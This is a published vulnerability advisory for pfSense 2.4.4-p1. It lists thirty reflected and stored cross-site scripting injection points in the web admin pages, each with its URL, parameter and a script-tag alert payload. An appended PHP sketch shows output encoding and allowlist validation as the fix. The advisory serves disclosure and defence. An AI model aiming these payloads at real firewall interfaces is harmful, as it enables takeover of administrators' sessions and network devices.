pfSense 2.4.4-p1 - Cross-Site Scripting

Author: Ozer Goker
Platform: multiple
Release date: 2019-02-04

##################################################################################################################################
# Exploit Title: pfSense 2.4.4-p1 | Cross-Site Scripting
# Date: 28.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.pfsense.org
# Software Link: https://frafiles.pfsense.org/mirror/downloads/pfSense-CE-2.4.4-RELEASE-p1-amd64.iso.gz
# Version: 2.4.4-p1
##################################################################################################################################

Introduction
pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.


#################################################################################


XSS details: Reflected & Stored

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/system_advanced_admin.php

METHOD
Post

PARAMETER
webguiproto

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/interfaces_assign.php

METHOD
Post

PARAMETER
wan

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
dscp

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
tagged

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
statetype

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
vlanprio

PAYLOAD
"><script>alert(7)</script>

#################################################################################

XSS8 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
vlanprioset

PAYLOAD
"><script>alert(8)</script>

#################################################################################

XSS9 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
dnpipe

PAYLOAD
"><script>alert(9)</script>

#################################################################################

XSS10 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
defaultqueue

PAYLOAD
"><script>alert(10)</script>

#################################################################################

XSS11 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
dscp

PAYLOAD
"><script>alert(11)</script>

#################################################################################

XSS12 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(12)</script>

#################################################################################

XSS13 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
tagged

PAYLOAD
"><script>alert(13)</script>

#################################################################################

XSS14 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
statetype

PAYLOAD
"><script>alert(14)</script>

#################################################################################

XSS15 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
vlanprio

PAYLOAD
"><script>alert(15)</script>

#################################################################################

XSS16 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
vlanprioset

PAYLOAD
"><script>alert(16)</script>

#################################################################################

XSS17 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
dnpipe

PAYLOAD
"><script>alert(17)</script>

#################################################################################

XSS18 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
defaultqueue

PAYLOAD
"><script>alert(18)</script>

#################################################################################

XSS19 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
dscp

PAYLOAD
"><script>alert(19)</script>

#################################################################################

XSS20 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(20)</script>

#################################################################################

XSS21 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
tagged

PAYLOAD
"><script>alert(21)</script>

#################################################################################

XSS22 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
statetype

PAYLOAD
"><script>alert(22)</script>

#################################################################################

XSS23 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
vlanprio

PAYLOAD
"><script>alert(23)</script>

#################################################################################

XSS24 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
vlanprioset

PAYLOAD
"><script>alert(24)</script>

#################################################################################

XSS25 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
dnpipe

PAYLOAD
"><script>alert(25)</script>

#################################################################################

XSS26 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
defaultqueue

PAYLOAD
"><script>alert(26)</script>

#################################################################################

XSS27 | Reflected

URL
http://192.168.2.200/firewall_shaper.php

METHOD
Post

PARAMETER
name

PAYLOAD
"><script>alert(27)</script>

#################################################################################

XSS28 | Stored

URL
http://192.168.2.200/services_igmpproxy_edit.php

METHOD
Post

PARAMETER
address0

PAYLOAD
"><script>alert(28)</script>

#################################################################################

XSS29 | Stored

URL
http://192.168.2.200/services_ntpd_gps.php

METHOD
Post

PARAMETER
gpstype

PAYLOAD
"><script>alert(29)</script>

#################################################################################

XSS30 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(30)</script>

#################################################################################
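
All thirty entries use the same payload shape: a double quote and `>` that close an HTML attribute, followed by a script element. The sketch below shows that break-out next to output encoding and allowlist validation. It is an added example, not code from the advisory or from pfSense; the helper functions, the allowlist for webguiproto and the sample config array are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added illustration: hypothetical helpers, not pfSense source code.

/**
 * Vulnerable pattern: the value is concatenated into the attribute as-is,
 * so a double quote inside it closes value="..." and the rest of the
 * string is parsed as markup.
 */
function render_field_unsafe(string $name, string $value): string
{
    return '<input name="' . $name . '" value="' . $value . '">';
}

/**
 * Hardened pattern: encode for the HTML attribute context at output time.
 * ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE replaces invalid
 * byte sequences instead of returning an empty string.
 */
function render_field_safe(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<input name="' . htmlspecialchars($name, $flags, 'UTF-8')
         . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '">';
}

/**
 * Input-side check for fields that only have a fixed set of legal values:
 * anything outside the allowlist is rejected before it is stored or echoed.
 */
function validate_choice(string $value, array $allowed): bool
{
    return in_array($value, $allowed, true);
}

// Allowlist assumed for this example; the real set of legal values
// belongs to the application.
$allowedProto = ['http', 'https'];

// Payload string as listed in the advisory entries.
$submitted = '"><script>alert(1)</script>';

// Reflected case: the POSTed value is written back into the form.
$reflectedUnsafe = render_field_unsafe('webguiproto', $submitted);
$reflectedSafe   = render_field_safe('webguiproto', $submitted);

// Stored case: the value was saved earlier and is rendered on a later
// request. Constructed stand-in for saved rule data. Encoding has to
// happen here as well, because the value no longer passes through the
// request handler that could have validated it.
$savedRule  = ['tag' => $submitted];
$storedSafe = render_field_safe('tag', $savedRule['tag']);

echo "unsafe : ", $reflectedUnsafe, PHP_EOL;
echo "safe   : ", $reflectedSafe, PHP_EOL;
echo "stored : ", $storedSafe, PHP_EOL;

// The enumerated parameter is refused outright; the free-text one relies
// on output encoding.
echo "webguiproto accepted: ",
     validate_choice($submitted, $allowedProto) ? 'yes' : 'no', PHP_EOL;
echo "script tag survives encoding: ",
     strpos($reflectedSafe, '<script>') !== false ? 'yes' : 'no', PHP_EOL;
```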